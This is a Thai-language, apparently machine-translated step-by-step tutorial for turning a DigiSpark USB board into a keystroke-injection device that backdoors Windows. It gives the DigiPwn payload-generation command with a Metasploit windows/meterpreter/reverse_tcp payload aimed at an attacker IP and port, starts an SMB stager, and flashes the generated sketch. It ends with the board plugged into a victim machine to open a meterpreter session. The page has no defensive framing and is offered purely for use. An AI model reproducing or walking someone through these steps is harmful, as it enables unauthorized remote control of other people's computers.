สารบัญ:
2025 ผู้เขียน: John Day | [email protected]. แก้ไขล่าสุด: 2025-01-13 06:58
แล้วเรามาทำอะไรที่นี่?
DigiSpark เป็นเครื่องมือพัฒนาขนาดเล็กที่ใช้ Arduino ซึ่งสามารถทำหน้าที่เป็นอินพุตคีย์บอร์ด HID วันนี้เราจัดการอุปกรณ์นี้เพื่อแบ็คดอร์ระบบปฏิบัติการ Windows!
เสบียง
Arduino IDE
เครื่องทำหน้าต่าง
DigiSpark
Metasploit Framework
Python 2.7 (หมายเหตุ: คุณต้องมี python "2.7" อย่าไปสำหรับเวอร์ชันอื่น)
อิมแพคเก็ต
สมอง! มันช่วย
ขั้นตอนที่ 1: โคลนที่เก็บ DigiPwn
โคลนไปยัง GitHub repo ของ DigiPwn โดย
โคลน git
ตอนนี้เปลี่ยนไดเร็กทอรีเป็น DigiPwn โดย
ซีดี DigiPwn/
ขั้นตอนที่ 2: ติดตั้ง Impacket [โมดูลที่ Python ต้องการ]
โมดูลนี้จำเป็นสำหรับการรันเซิร์ฟเวอร์ SMB ซึ่งจำเป็นสำหรับไลบรารีเพย์โหลด
sudo apt-get ติดตั้ง python-impacket
หรือคุณสามารถดาวน์โหลดไลบรารีอิมแพคเก็ตและติดตั้งได้จากที่นี่
ขั้นตอนที่ 3: มาสร้าง Payload กันเถอะ
วิ่ง
หลาม DigiPwn.py [HOST] [PORT] [PAYLOAD] [ไฟล์เอาต์พุต] [รูปแบบ]
อดีต
หลาม DigiPwn.py 192.168.1.2 8080 windows/meterpreter/reverse_tcp win.vbs win.vbs
ตอนนี้ระบบจะถามคุณว่าควรเริ่ม stager และเซิร์ฟเวอร์ SMB หรือไม่ กด y แล้วกด enter
ขั้นตอนที่ 4: ตอนนี้อัปโหลดรหัสไปยัง Arduino
ก่อนที่เราจะอัปโหลดเราต้องตรวจสอบให้แน่ใจว่าได้ติดตั้งบอร์ด DigiSpark ใน Arduino เพื่อดูที่นี่
หลังจากนั้นให้อัปโหลดไฟล์ keystroke_inject.ino ที่สร้างโดยสคริปต์ เมื่อเสร็จแล้วคุณก็พร้อมที่จะ
ขั้นตอนที่ 5: ถึงเวลาเสียบปลั๊กทารก
เสียบ DigiSpark ของคุณตอนนี้แล้วรอ 10 วินาที
BOOM เปิดเซสชันเครื่องวัดระยะแล้ว!